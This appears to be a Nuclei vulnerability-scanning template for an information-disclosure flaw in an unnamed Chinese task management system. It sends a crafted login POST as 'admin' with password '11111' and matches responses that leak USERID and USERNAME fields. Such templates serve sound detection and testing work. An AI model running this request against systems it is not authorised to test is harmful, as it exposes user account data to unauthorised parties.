id: bms-info-leak

info:
  name: 某任务管理系统信息泄露漏洞
  author: qwtd
  severity: medium
  reference:
    - https://mp.weixin.qq.com/s/L9_i0oTvhkAAPu94YzAL4Q

http:
  - raw:
      - |
        POST /Login/LoginUser HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 79
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: keep-alive

        {"RecordID":"admin","password":"11111","undefined":"登录","language":"zh-CN"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'success":0'
          - "USERID"
          - "USERNAME"
        part: body
        condition: and